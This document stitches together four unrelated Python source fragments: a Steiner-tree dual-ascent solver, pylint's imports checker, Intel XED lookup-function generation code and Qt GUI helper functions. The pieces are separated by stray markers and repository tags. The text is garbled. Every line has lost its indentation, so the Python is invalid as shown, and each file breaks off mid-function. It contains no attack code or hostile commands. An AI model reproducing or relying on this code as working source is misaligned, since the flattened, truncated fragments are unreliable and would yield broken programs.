track = len(steiner.graph.edges)
solution_limit = min(solution_limit, len(ts))
target_roots = set()
seed = self.runs
# Distribute the root selection to not choose the same again and again
while DualAscent.good_roots and len(target_roots) <= solution_limit / 2:
el = DualAscent.good_roots.pop()
if steiner.graph.has_node(el):
target_roots.add(el)
seed = el
DualAscent.good_roots.clear()
seed += self.runs
for idx in ((i * 196613 + seed) % len(ts) for i in range(1, len(ts) + 1)):
if len(target_roots) == solution_limit:
break
el = ts[idx]
seed = el
target_roots.add(el)
target_roots = [ts[max(len(ts) / solution_limit, 1) * i] for i in xrange(0, solution_limit)]
results = []
algs = [self.calc, self.calc3]
# Generate solutions
for i in range(0, len(target_roots)):
r = target_roots[i]
results.append(algs[1](steiner.graph, r, steiner.terminals))
results.sort(key=lambda x: x[0], reverse=True)
solution_pool = []
# Tries to recombine solution graphs into a better solution
if solution_rec_limit > 0:
solution_rec_idx = list(self.index_generator(0, len(results), solution_rec_limit))
solution_pool.extend(self.find_new(steiner, [results[i] for i in idx]) for idx in solution_rec_idx)
# Tries to find better graphs be pruning the solutions
if prune_limit > 0:
solution_pool.extend(self.prune_ascent(steiner, results[i])
for i in range(0, min(len(results), prune_limit)))
# Tries to find better solutions by recombining the solutions found above
if prune_rec_limit > 0:
solution_pool.sort(key=lambda tr: tr.cost)
pruned_idx = self.index_generator(0, min(10, len(solution_pool)), prune_rec_limit)
solution_pool.extend(self.find_new_from_sol(steiner, [solution_pool[i] for i in idx]) for idx in pruned_idx)
# Find best upper bound from all solutions
ub = min(solution_pool, key=lambda tr: tr.cost)
if ub.cost < steiner.get_approximation().cost:
steiner._approximation = ub
# Reduce graph
steiner.lower_bound = results[0][0]
for c_bnd, c_g, c_root in results:
self.reduce_graph(steiner, c_g, c_bnd, c_root)
DualAscent.value, DualAscent.graph, DualAscent.root = results[0]
# Inversed order, so best is the last element
for i in reversed(range(0, len(results))):
DualAscent.good_roots.append(results[i][2])
track = track - len(steiner.graph.edges)
if track > 0:
steiner.invalidate_steiner(-2)
steiner.invalidate_dist(-2)
steiner.invalidate_approx(0)
self.enabled = track > goal
return track
def reduce_graph(self, steiner, g, bnd, root):
"""Removes nodes that violate the upper bound using the dual ascent solution as a lower bound"""
if len(steiner.terminals) <= 3:
return
pred = g._pred
root_dist = single_source_dijkstra_path_length(g, root)
vor = self.voronoi(g, [t for t in steiner.terminals if t != root])
edges = set()
limit = steiner.get_approximation().cost - bnd
for (t, v) in vor.items():
for (n, d) in v.items():
if steiner.graph.has_node(n):
# Theoretically the paths should be arc-disjoint -> possible tighter bound
if root_dist[n] + d > limit:
steiner.remove_node(n)
else:
for n2, dta in pred[n].items():
if steiner.graph.has_edge(n2, n) and root_dist[n2] + dta['weight'] + d > limit:
if (n, n2) in edges:
steiner.remove_edge(n, n2)
else:
edges.add((n2, n))
def index_generator(self, start, end, count):
"""Produces count many numbers distributed between start and end"""
gap = end - start
c_count = 1
while c_count <= count:
target = max(2, min(gap, gap / c_count + 1))
yield [start + (i * 83 + c_count) % gap for i in range(0, target)]
c_count += 1
def prune_ascent(self, steiner, result):
og = sg.SteinerGraph()
bnd, g, r = result
og.terminals = set(steiner.terminals)
for (u, v, d) in g.edges(data='weight'):
if d == 0:
og.add_edge(u, v, steiner.graph[u][v]['weight'])
sol = sa.SteinerApproximation(og, limit=10)
red = Reducer(self.reducers(), run_limit=5)
for i in xrange(0, 3):
red.reduce(og)
sol2 = self.prune(og, max(1, len(og.graph.edges)) / 10, sol.tree)
if sol2 is None:
break
red.reset()
sol2.tree, sol2.cost = red.unreduce(sol2.tree, sol2.cost)
if sol2.cost < sol.cost:
sol = sol2
if len(og.terminals) < 3:
break
return sol
def calc_edge_weight(self, g, u, v, d, tw):
dist1 = g.get_restricted_closest(u)[0]
dist2 = g.get_restricted_closest(v)[0]
if dist1[0] != dist2[0]:
return d + dist1[1] + dist2[1] + tw
else:
d12 = g.get_restricted_closest(u)[1][1]
d22 = g.get_restricted_closest(v)[1][1]
if d12 < maxint and d22 < maxint:
return d + min(dist1[1] + d22, dist2[1] + d12) + tw
else:
return d + dist1[1] + dist2[1] + tw
def prune(self, g, min_removal, tree):
if len(g.terminals) < 3:
return sa.SteinerApproximation(g)
radius = g.get_radius()
t_weight = sum(radius[i][0] for i in xrange(0, len(g.terminals) - 2))
# TODO: Make this more efficient
# Choose bound s.t. we eliminate at least min_removal edges
edge_weights = [self.calc_edge_weight(g, u, v, d, t_weight) for (u, v, d) in g.graph.edges(data='weight')]
edge_weights.sort(reverse=True)
bnd = edge_weights[min(len(edge_weights)-1, min_removal)]
for n in list(g.graph.nodes):
# While all terminals must be in the tree, the list of terminals may have changed during preprocessing
if not tree.has_node(n) and n not in g.terminals:
dists = g.get_restricted_closest(n)
if dists[1][1] < maxint:
total = dists[0][1] + dists[1][1] + t_weight
if total > bnd:
g.remove_node(n)
if not is_connected(g.graph):
return None
g.invalidate_steiner(-2)
g.invalidate_dist(-2)
g.invalidate_approx(-2)
result = sa.SteinerApproximation(g, limit=10)
return result
def find_new_from_sol(self, steiner, solutions):
"""Combines (unoptimal) steiner trees into a new solution"""
red = Reducer(self.reducers(), run_limit=5)
alpha = defaultdict(lambda: 0)
dg = sg.SteinerGraph()
dg.terminals = set(steiner.terminals)
for ct in solutions:
for (u, v, d) in ct.tree.edges(data='weight'):
u, v = min(u, v), max(u, v)
dg.add_edge(u, v, d)
alpha[(u, v)] += 1
red.reduce(dg)
max_occ = len(solutions)
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
dg.graph[u][v]['weight'] += (1 + (max_occ - d)) * 100
app = sa.SteinerApproximation(dg, False, limit=10)
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
modifier = (1 + (max_occ - d)) * 100
dg.graph[u][v]['weight'] -= modifier
if app.tree.has_edge(u, v):
app.tree[u][v]['weight'] -= modifier
app.optimize()
r_result = red.unreduce(app.tree, app.cost)
app.tree = r_result[0]
app.cost = r_result[1]
return app
def find_new(self, steiner, results):
"""Combines solution graphs into a new solution"""
red = Reducer(self.reducers(), run_limit=5)
alpha = defaultdict(set)
dg = sg.SteinerGraph()
dg.terminals = {x for x in steiner.terminals}
for (bnd, g, r) in results:
# 0 length paths
pths = single_source_dijkstra_path(g, r, cutoff=1)
for t in (t for t in steiner.terminals if t != r):
for i in range(1, len(pths[t])):
u, v = pths[t][i-1], pths[t][i]
u, v = min(u, v), max(u, v)
alpha[(u, v)].add(r)
if not dg.graph.has_edge(u, v):
dg.add_edge(u, v, steiner.graph[u][v]['weight'])
red.reduce(dg)
max_occ = len(results)
alpha = {(u, v): len(d) for ((u, v), d) in alpha.items()}
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
dg.graph[u][v]['weight'] += (1 + (max_occ - d)) * 100
app = sa.SteinerApproximation(dg, False, limit=10)
for ((u, v), d) in alpha.items():
if d > 0 and dg.graph.has_edge(u, v):
modifier = (1 + (max_occ - d)) * 100
dg.graph[u][v]['weight'] -= modifier
| |
<reponame>lockhart39/HueQualityAndIngestionApp<gh_stars>1-10
# Copyright (c) 2003-2012 LOGILAB S.A. (Paris, FRANCE).
# http://www.logilab.fr/ -- mailto:<EMAIL>
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
"""imports checkers for Python code"""
from logilab.common.graph import get_cycles, DotBackend
from logilab.common.modutils import is_standard_module
from logilab.common.ureports import VerbatimText, Paragraph
from logilab import astng
from logilab.astng import are_exclusive
from pylint.interfaces import IASTNGChecker
from pylint.checkers import BaseChecker, EmptyReport
def get_first_import(node, context, name, base, level):
"""return the node where [base.]<name> is imported or None if not found
"""
fullname = '%s.%s' % (base, name) if base else name
first = None
found = False
for first in context.body:
if first is node:
continue
if first.scope() is node.scope() and first.fromlineno > node.fromlineno:
continue
if isinstance(first, astng.Import):
if any(fullname == iname[0] for iname in first.names):
found = True
break
elif isinstance(first, astng.From):
if level == first.level and any(
fullname == '%s.%s' % (first.modname, iname[0]) for iname in first.names):
found = True
break
if found and not are_exclusive(first, node):
return first
# utilities to represents import dependencies as tree and dot graph ###########
def make_tree_defs(mod_files_list):
"""get a list of 2-uple (module, list_of_files_which_import_this_module),
it will return a dictionary to represent this as a tree
"""
tree_defs = {}
for mod, files in mod_files_list:
node = (tree_defs, ())
for prefix in mod.split('.'):
node = node[0].setdefault(prefix, [{}, []])
node[1] += files
return tree_defs
def repr_tree_defs(data, indent_str=None):
"""return a string which represents imports as a tree"""
lines = []
nodes = data.items()
for i, (mod, (sub, files)) in enumerate(sorted(nodes, key=lambda x: x[0])):
if not files:
files = ''
else:
files = '(%s)' % ','.join(files)
if indent_str is None:
lines.append('%s %s' % (mod, files))
sub_indent_str = ' '
else:
lines.append(r'%s\-%s %s' % (indent_str, mod, files))
if i == len(nodes)-1:
sub_indent_str = '%s ' % indent_str
else:
sub_indent_str = '%s| ' % indent_str
if sub:
lines.append(repr_tree_defs(sub, sub_indent_str))
return '\n'.join(lines)
def dependencies_graph(filename, dep_info):
"""write dependencies as a dot (graphviz) file
"""
done = {}
printer = DotBackend(filename[:-4], rankdir = "LR")
printer.emit('URL="." node[shape="box"]')
for modname, dependencies in sorted(dep_info.iteritems()):
done[modname] = 1
printer.emit_node(modname)
for modname in dependencies:
if modname not in done:
done[modname] = 1
printer.emit_node(modname)
for depmodname, dependencies in sorted(dep_info.iteritems()):
for modname in dependencies:
printer.emit_edge(modname, depmodname)
printer.generate(filename)
def make_graph(filename, dep_info, sect, gtype):
"""generate a dependencies graph and add some information about it in the
report's section
"""
dependencies_graph(filename, dep_info)
sect.append(Paragraph('%simports graph has been written to %s'
% (gtype, filename)))
# the import checker itself ###################################################
MSGS = {
'F0401': ('Unable to import %s',
'import-error',
'Used when pylint has been unable to import a module.'),
'R0401': ('Cyclic import (%s)',
'cyclic-import',
'Used when a cyclic import between two or more modules is \
detected.'),
'W0401': ('Wildcard import %s',
'wildcard-import',
'Used when `from module import *` is detected.'),
'W0402': ('Uses of a deprecated module %r',
'deprecated-module',
'Used a module marked as deprecated is imported.'),
'W0403': ('Relative import %r, should be %r',
'relative-import',
'Used when an import relative to the package directory is \
detected.'),
'W0404': ('Reimport %r (imported line %s)',
'reimported',
'Used when a module is reimported multiple times.'),
'W0406': ('Module import itself',
'import-self',
'Used when a module is importing itself.'),
'W0410': ('__future__ import is not the first non docstring statement',
'misplaced-future',
'Python 2.5 and greater require __future__ import to be the \
first non docstring statement in the module.'),
}
class ImportsChecker(BaseChecker):
"""checks for
* external modules dependencies
* relative / wildcard imports
* cyclic imports
* uses of deprecated modules
"""
__implements__ = IASTNGChecker
name = 'imports'
msgs = MSGS
priority = -2
options = (('deprecated-modules',
{'default' : ('regsub', 'string', 'TERMIOS',
'Bastion', 'rexec'),
'type' : 'csv',
'metavar' : '<modules>',
'help' : 'Deprecated modules which should not be used, \
separated by a comma'}
),
('import-graph',
{'default' : '',
'type' : 'string',
'metavar' : '<file.dot>',
'help' : 'Create a graph of every (i.e. internal and \
external) dependencies in the given file (report RP0402 must not be disabled)'}
),
('ext-import-graph',
{'default' : '',
'type' : 'string',
'metavar' : '<file.dot>',
'help' : 'Create a graph of external dependencies in the \
given file (report RP0402 must not be disabled)'}
),
('int-import-graph',
{'default' : '',
'type' : 'string',
'metavar' : '<file.dot>',
'help' : 'Create a graph of internal dependencies in the \
given file (report RP0402 must not be disabled)'}
),
)
def __init__(self, linter=None):
BaseChecker.__init__(self, linter)
self.stats = None
self.import_graph = None
self.__int_dep_info = self.__ext_dep_info = None
self.reports = (('RP0401', 'External dependencies',
self.report_external_dependencies),
('RP0402', 'Modules dependencies graph',
self.report_dependencies_graph),
)
def open(self):
"""called before visiting project (i.e set of modules)"""
self.linter.add_stats(dependencies={})
self.linter.add_stats(cycles=[])
self.stats = self.linter.stats
self.import_graph = {}
def close(self):
"""called before visiting project (i.e set of modules)"""
# don't try to compute cycles if the associated message is disabled
if self.linter.is_message_enabled('R0401'):
for cycle in get_cycles(self.import_graph):
self.add_message('R0401', args=' -> '.join(cycle))
def visit_import(self, node):
"""triggered when an import statement is seen"""
modnode = node.root()
for name, _ in node.names:
importedmodnode = self.get_imported_module(modnode, node, name)
if importedmodnode is None:
continue
self._check_relative_import(modnode, node, importedmodnode, name)
self._add_imported_module(node, importedmodnode.name)
self._check_deprecated_module(node, name)
self._check_reimport(node, name)
def visit_from(self, node):
"""triggered when a from statement is seen"""
basename = node.modname
if basename == '__future__':
# check if this is the first non-docstring statement in the module
prev = node.previous_sibling()
if prev:
# consecutive future statements are possible
if not (isinstance(prev, astng.From)
and prev.modname == '__future__'):
self.add_message('W0410', node=node)
return
modnode = node.root()
importedmodnode = self.get_imported_module(modnode, node, basename)
if importedmodnode is None:
return
self._check_relative_import(modnode, node, importedmodnode, basename)
self._check_deprecated_module(node, basename)
for name, _ in node.names:
if name == '*':
self.add_message('W0401', args=basename, node=node)
continue
self._add_imported_module(node, '%s.%s' % (importedmodnode.name, name))
self._check_reimport(node, name, basename, node.level)
def get_imported_module(self, modnode, importnode, modname):
try:
return importnode.do_import_module(modname)
except astng.InferenceError, ex:
if str(ex) != modname:
args = '%r (%s)' % (modname, ex)
else:
args = repr(modname)
self.add_message("F0401", args=args, node=importnode)
def _check_relative_import(self, modnode, importnode, importedmodnode,
importedasname):
"""check relative import. node is either an Import or From node, modname
the imported module name.
"""
if 'W0403' not in self.active_msgs:
return
if importedmodnode.file is None:
return False # built-in module
if modnode is importedmodnode:
return False # module importing itself
if modnode.absolute_import_activated() or getattr(importnode, 'level', None):
return False
if importedmodnode.name != importedasname:
# this must be a relative import...
self.add_message('W0403', args=(importedasname, importedmodnode.name),
node=importnode)
def _add_imported_module(self, node, importedmodname):
"""notify an imported module, used to analyze dependencies"""
context_name = node.root().name
if context_name == importedmodname:
# module importing itself !
self.add_message('W0406', node=node)
elif not is_standard_module(importedmodname):
# handle dependencies
importedmodnames = self.stats['dependencies'].setdefault(
importedmodname, set())
if not context_name in importedmodnames:
importedmodnames.add(context_name)
if is_standard_module(importedmodname, (self.package_dir(),)):
# update import graph
mgraph = self.import_graph.setdefault(context_name, set())
if not importedmodname in mgraph:
mgraph.add(importedmodname)
def _check_deprecated_module(self, node, mod_path):
"""check if the module is deprecated"""
for mod_name in self.config.deprecated_modules:
if mod_path == mod_name or mod_path.startswith(mod_name + '.'):
self.add_message('W0402', node=node, args=mod_path)
def _check_reimport(self, node, name, basename=None, level=None):
"""check if the import is necessary (i.e. not already done)"""
if 'W0404' not in self.active_msgs:
return
frame = node.frame()
root = node.root()
contexts = [(frame, level)]
if root is not frame:
contexts.append((root, None))
for context, level in contexts:
first = get_first_import(node, context, name, basename, level)
if first is not None:
self.add_message('W0404', node=node,
args=(name, first.fromlineno))
def report_external_dependencies(self, sect, _, dummy):
"""return a verbatim layout for displaying dependencies"""
dep_info = make_tree_defs(self._external_dependencies_info().iteritems())
if not dep_info:
raise EmptyReport()
tree_str = repr_tree_defs(dep_info)
sect.append(VerbatimText(tree_str))
def report_dependencies_graph(self, sect, _, dummy):
"""write dependencies as a dot (graphviz) file"""
dep_info = self.stats['dependencies']
if not dep_info or not (self.config.import_graph
or self.config.ext_import_graph
or self.config.int_import_graph):
| |
#BEGIN_LEGAL
#
#Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#END_LEGAL
import genutil
import ildutil
import codegen
import re
import opnds
def is_target_op(agi, op, target_op):
"""
@param op: instruction_info_t.operands[i] - the binded operand by an NT row
@param target_op: string - the name of the target operand
@param agi: all_generator_info_t - the main generator's data structure
(as usual)
Function returns true if op's name is target_op or if op is a macro which
expansion contains target_op
"""
state_dict = agi.common.state_bits
return (op.name.upper() == target_op or
(op.name.lower() in state_dict and
target_op in state_dict[op.name.lower()].dump_str()))
#Parameters:
def get_setting_nts(agi, opname):
"""
@param opname: string - name of the operand
Function returns a list of strings which are the names of NTs that bind
an operand with name opname
"""
state_dict = agi.common.state_bits
nt_set = set()
for nt_name in list(agi.nonterminal_dict.keys()):
gi = agi.generator_dict[nt_name]
parser = gi.parser_output
for rule in parser.instructions:
for op in rule.operands:
if is_target_op(agi, op, opname):
nt_set.add(nt_name)
return nt_set
def get_nt_seq(ptrn_wrds, nt_list, implied_nt=None):
"""
@param ptrn_wrds: [string] - list of tokens of pattern string of an
instruction (result of split() on pattern string)
@param nt_list: [string] - list of strings which are names of NTs that
we look for in the pattern
@param implied_nt: string - name of an NT which is prepended to the
output list this NT is implied and doesn't appear in the instruction's
pattern (e.g. OSZ_NONTERM)
@return: a list of strings which are names of NTs from nt_list that
were found in ptrn_wrds first NT is implied default NT (for EOSZ for
example it's OSZ_NONTERM)
"""
seq = []
if implied_nt:
seq.append(implied_nt)
for w in ptrn_wrds:
no_brackets = re.sub('[(][)]', '',w)
if no_brackets in nt_list:
seq.append(no_brackets)
return seq
def gen_nt_seq_lookup(agi, nt_seq, target_op, target_type=None):
"""
@param nt_seq: [string] - list of strings which are names of the NTs that
bind the target_op. Nts appear in the same order as they were found
in instruction's pattern (e.g [OSZ_NONTERM, DF64]
@param target_op: string - name of the operand that is bound by NTs
(e.g. EOSZ)
@param target_type: string - the type of target operand
(xed_bits_t for example).
Used when we need to override the type specified in grammar.
@return: codegen.array_gen_t lookup array which defines a mapping
from certain operand deciders to the value of target_op
e.g. a mapping from {OSZ, MOD, REXW} to EOSZ
This mapping is defined by the sequence of NTs (nt_seq)
by collapsing individual mapping of each NT into one combined mapping
"""
#first NT in sequence is the implicit base one
#for EOSZ and EASZ. For immediate lookup we don't have such
#a notion of implicit base NT.
state_space = agi.common.state_space
gi = agi.generator_dict[nt_seq[0]]
argnames = generate_lookup_function_basis(gi,state_space)
base_dict = gen_lookup_dict(agi, nt_seq[0], target_op, argnames)
if not base_dict:
return None
map_list = []
for nt_name in nt_seq[1:]:
lookup_dict = gen_lookup_dict(agi, nt_name, target_op, argnames)
if not lookup_dict:
return None
map_list.append(lookup_dict)
comb_map = combine_mapping_seq(base_dict, map_list)
if not comb_map:
return None
return gen_lookup_array(agi, nt_seq, comb_map, target_op, argnames,
target_type)
#nt_name: string - the name of NT that defines the mapping
#target_opname: string - the name of the operand the mapping maps to
#(e.g. EOSZ)
#argnames: {string -> { string -> Boolean } } a dict of dicts
#first key is operand decider name, second key is operand decider value
#argnames['MOD']['0'] == True iff operand decider MOD can have value '0'
#Returns list of tuples
# [ ([{token:string -> index_value:string}], return-value:string) ]
#this list defines a mapping from operand deciders values to target_op value
#described by given NT (with nt_name)
#FIXME: sometimes (ONE():: NT) target_op bounded by all different rows has
#same value. It happens when there are other operands bounded too. We need
#to detect such cases and generate empty dict so that constant function would
#be generated for such NTs.
def gen_lookup_dict(agi, nt_name, target_opname, argnames):
gi = agi.generator_dict[nt_name]
options = agi.common.options
state_space = agi.common.state_space
operand_storage = agi.operand_storage
all_values = []
for ii in gi.parser_output.instructions:
#First check if current rule sets the operand, if not
#go to next rule
target_op = None
for op in ii.operands:
if is_target_op(agi, op, target_opname):
target_op = op
break
if not target_op:
continue
state_dict = agi.common.state_bits
#if binding operand is a macro
if target_op.name.lower() in state_dict:
op_spec = state_dict[target_op.name.lower()].list_of_str
found_op = False
for w in op_spec:
if w.startswith(target_opname):
found_op = True
break
if not found_op:
ildutil.ild_err("Failed to find operand %s" % str(target_op))
expansion = w
target_op = opnds.parse_one_operand(expansion)
# the operand is the table output value
if target_op.bits: # RHS of the 1st operand
this_row_output = target_op.bits
else:
ildutil.ild_err("NTLUF operand %s" % str(target_op))
# Now we must get the table index values as a dictionary
indices = _generate_lookup_function_indices(ii,state_space,argnames)
all_values.append((indices,this_row_output))
return all_values
def get_nt_from_lufname(fname):
suffix = re.sub('xed_lookup_function_', '', fname)
nt = re.sub('_getter', '', suffix)
return nt
def get_lufn_suffix(array):
lufn = array.lookup_fn.function_name
suffix = re.sub('xed_lookup_function_', '', lufn)
return suffix
def get_lufn(nt_seq, target_op, flevel=''):
lu_name = '_'.join(nt_seq)
lu_fn = 'xed_lookup_function_%s_%s' % (lu_name, target_op)
if len(flevel) > 0:
lu_fn += '_%s' % flevel
return lu_fn
def gen_lu_names(nt_seq, target_op, level=''):
"""
@param nt_seq: List of NT names.
@type nt_seq: C{[string]}
@param target_op: Name of bounded operand.
@type target_op: C{string}
@return (lu_arr, init_fn, lu_fn):
Tuple of 3 names: lookup array name, init function name and
lookup function name.
"""
lu_name = '_'.join(nt_seq)
lu_arr = 'xed_lookup_%s_%s' % (lu_name, target_op)
init_fn = 'xed_lookup_function_init_%s_%s' % (lu_name, target_op)
lu_fn = get_lufn(nt_seq, target_op, flevel=level)
return (lu_arr, init_fn, lu_fn)
def get_luf_name_suffix(luf_name):
return re.sub('xed_lookup_function_', '', luf_name)
def _is_constant_mapping(val_dict):
"""
@param val_dict:
Defines the mapping, by defining an output value for each row of
constrains. Each row is defined by a dictionary of operand names to
operand values.
@type val_dict:
[ ([ dict(opname:string -> opval:string) ], value:string) ]
The return type of gen_lookup_dict function
@return bool: True if mapping defined by val_dict always returns same
value. And hence we can define a constant function, not dependent on
parameters.
This is relevant for ONE() NT that has same IMM_WIDTH output operand
value for several different index values.
A good question is why it was defined that way.
"""
#check if we have same output values for all rows,
#then we should generate a constant function, independent from parameters
#This happens in ONE() NT for IMM_WIDTH
#ONE() seems to be pretty useless NT.
(_first_indices, first_output) = val_dict[0]
all_same = True
for _indices,out_val in val_dict[1:]:
if out_val != first_output:
all_same = False
break
return all_same
#Parameters:
#nt_seq: [string] - list of NT names that define the mapping
#val_dict: [ ([{token:string -> index_value:string}], return-value:string) ]
#(the type returned by gen_lookup_dict), it defines the mapping
#opname: string - the name of target operand e.g. EOSZ
#argnames: {string -> { string -> Boolean } } a dict of dicts
#optype: string - the type of target op (the return type of the
#lookup function). If optype is specified it is used instead of
#agi's defined operand type for opname. Useful for IMM_WIDTH which is defined
#as xed_uint8_t by grammar, but for ILD purposes should be natural int
#(xed_bits_t), because byte-sized operations are sub-optimal in performance in
#32 or 64 modes.
#first key is operand decider name, second key is operand decider value
#argnames['MOD']['0'] == True iff operand decider MOD can have value '0'
#returns codegen.array_gen_t lookup array that defines the mapping
def gen_lookup_array(agi, nt_seq, val_dict, opname, argnames,
optype=None, flevel=''):
operand_storage = agi.operand_storage
(lu_arr, init_fn, lu_fn) = gen_lu_names(nt_seq, opname, level=flevel)
if not optype:
luf_return_type = operand_storage.get_ctype(opname)
else:
luf_return_type = optype
array= codegen.array_gen_t(lu_arr, type=luf_return_type, target_op=opname)
#check if the | |
<filename>SMlib/utils/qthelpers.py<gh_stars>1-10
"""Qt utilities"""
import sys,os
sys.path.append('..'+ os.path.sep + '..' + os.path.sep)
from PyQt4.QtGui import (QAction, QStyle, QWidget, QIcon, QApplication,
QLabel, QVBoxLayout, QHBoxLayout, QLineEdit,
QKeyEvent, QMenu, QKeySequence, QToolButton,
QPixmap, QFileDialog)
from PyQt4.QtCore import (SIGNAL, QObject, Qt, QLocale, QTranslator,
QLibraryInfo, QEvent)
import re
import os.path as osp
# Local import
from SMlib.configs.baseconfig import get_image_path
from SMlib.configs.guiconfig import get_shortcut
from SMlib.utils import programs
from SMlib.py3compat import is_text_string, to_text_string
# Note: How to redirect a signal from widget *a* to widget *b* ?
# ----
# It has to be done manually:
# * typing 'SIGNAL("clicked()")' works
# * typing 'signalstr = "clicked()"; SIGNAL(signalstr)' won't work
# Here is an example of how to do it:
# (self.listwidget is widget *a* and self is widget *b*)
# self.connect(self.listwidget, SIGNAL('option_changed'),
# lambda *args: self.emit(SIGNAL('option_changed'), *args))
def get_icon(name, default=None, resample=False):
"""Return image inside a QIcon object
default: default image name or icon
resample: if True, manually resample icon pixmaps for usual sizes
(16, 24, 32, 48, 96, 128, 256). This is recommended for QMainWindow icons
created from SVG images on non-Windows platforms due to a Qt bug (see
http://code.google.com/p/spyderlib/issues/detail?id=1314)."""
if default is None:
icon = QIcon(get_image_path(name))
elif isinstance(default, QIcon):
icon_path = get_image_path(name, default=None)
icon = default if icon_path is None else QIcon(icon_path)
else:
icon = QIcon(get_image_path(name, default))
if resample:
icon0 = QIcon()
for size in (16, 24, 32, 48, 96, 128, 256, 512):
icon0.addPixmap(icon.pixmap(size, size))
return icon0
else:
return icon
def get_image_label(name, default="not_found.png"):
"""Return image inside a QLabel object"""
label = QLabel()
label.setPixmap(QPixmap(get_image_path(name, default)))
return label
class MacApplication(QApplication):
"""Subclass to be able to open external files with our Mac app"""
def __init__(self, *args):
QApplication.__init__(self, *args)
def event(self, event):
if event.type() == QEvent.FileOpen:
fname = str(event.file())
self.emit(SIGNAL('open_external_file(QString)'), fname)
return QApplication.event(self, event)
def qapplication(translate=True):
"""Return QApplication instance
Creates it if it doesn't already exist"""
if sys.platform == "darwin" and 'Spyder.app' in __file__:
SpyderApplication = MacApplication
else:
SpyderApplication = QApplication
app = SpyderApplication.instance()
if not app:
# Set Application name for Gnome 3
# https://groups.google.com/forum/#!topic/pyside/24qxvwfrRDs
app = SpyderApplication(['Spyder'])
if translate:
install_translator(app)
return app
def file_uri(fname):
"""Select the right file uri scheme according to the operating system"""
if os.name == 'nt':
# Local file
if re.search(r'^[a-zA-Z]:', fname):
return 'file:///' + fname
# UNC based path
else:
return 'file://' + fname
else:
return 'file://' + fname
QT_TRANSLATOR = None
def install_translator(qapp):
"""Install Qt translator to the QApplication instance"""
global QT_TRANSLATOR
if QT_TRANSLATOR is None:
qt_translator = QTranslator()
if qt_translator.load("qt_"+QLocale.system().name(),
QLibraryInfo.location(QLibraryInfo.TranslationsPath)):
QT_TRANSLATOR = qt_translator # Keep reference alive
if QT_TRANSLATOR is not None:
qapp.installTranslator(QT_TRANSLATOR)
def keybinding(attr):
"""Return keybinding"""
ks = getattr(QKeySequence, attr)
return QKeySequence.keyBindings(ks)[0]
def _process_mime_path(path, extlist):
if path.startswith(r"file://"):
if os.name == 'nt':
# On Windows platforms, a local path reads: file:///c:/...
# and a UNC based path reads like: file://server/share
if path.startswith(r"file:///"): # this is a local path
path=path[8:]
else: # this is a unc path
path = path[5:]
else:
path = path[7:]
if osp.exists(path):
if extlist is None or osp.splitext(path)[1] in extlist:
return path
def mimedata2url(source, extlist=None):
"""
Extract url list from MIME data
extlist: for example ('.py', '.pyw')
"""
pathlist = []
if source.hasUrls():
for url in source.urls():
path = _process_mime_path(to_text_string(url.toString()), extlist)
if path is not None:
pathlist.append(path)
elif source.hasText():
for rawpath in to_text_string(source.text()).splitlines():
path = _process_mime_path(rawpath, extlist)
if path is not None:
pathlist.append(path)
if pathlist:
return pathlist
def keyevent2tuple(event):
"""Convert QKeyEvent instance into a tuple"""
return (event.type(), event.key(), event.modifiers(), event.text(),
event.isAutoRepeat(), event.count())
def tuple2keyevent(past_event):
"""Convert tuple into a QKeyEvent instance"""
return QKeyEvent(*past_event)
def restore_keyevent(event):
if isinstance(event, tuple):
_, key, modifiers, text, _, _ = event
event = tuple2keyevent(event)
else:
text = event.text()
modifiers = event.modifiers()
key = event.key()
ctrl = modifiers & Qt.ControlModifier
shift = modifiers & Qt.ShiftModifier
return event, text, key, ctrl, shift
def create_toolbutton(parent, text=None, shortcut=None, icon=None, tip=None,
toggled=None, triggered=None,
autoraise=True, text_beside_icon=False):
"""Create a QToolButton"""
button = QToolButton(parent)
if text is not None:
button.setText(text)
if icon is not None:
if is_text_string(icon):
icon = get_icon(icon)
button.setIcon(icon)
if text is not None or tip is not None:
button.setToolTip(text if tip is None else tip)
if text_beside_icon:
button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
button.setAutoRaise(autoraise)
if triggered is not None:
QObject.connect(button, SIGNAL('clicked()'), triggered)
if toggled is not None:
QObject.connect(button, SIGNAL("toggled(bool)"), toggled)
button.setCheckable(True)
if shortcut is not None:
button.setShortcut(shortcut)
return button
def action2button(action, autoraise=True, text_beside_icon=False, parent=None):
"""Create a QToolButton directly from a QAction object"""
if parent is None:
parent = action.parent()
button = QToolButton(parent)
button.setDefaultAction(action)
button.setAutoRaise(autoraise)
if text_beside_icon:
button.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
return button
def toggle_actions(actions, enable):
"""Enable/disable actions"""
if actions is not None:
for action in actions:
if action is not None:
action.setEnabled(enable)
def create_action(parent, text, shortcut=None, icon=None, tip=None,
toggled=None, triggered=None, data=None, menurole=None,
context=Qt.WindowShortcut):
"""Create a QAction"""
action = QAction(text, parent)
if triggered is not None:
parent.connect(action, SIGNAL("triggered()"), triggered)
if toggled is not None:
parent.connect(action, SIGNAL("toggled(bool)"), toggled)
action.setCheckable(True)
if icon is not None:
if is_text_string(icon):
icon = get_icon(icon)
action.setIcon(icon)
if shortcut is not None:
action.setShortcut(shortcut)
if tip is not None:
action.setToolTip(tip)
action.setStatusTip(tip)
if data is not None:
action.setData(data)
if menurole is not None:
action.setMenuRole(menurole)
#TODO: Hard-code all shortcuts and choose context=Qt.WidgetShortcut
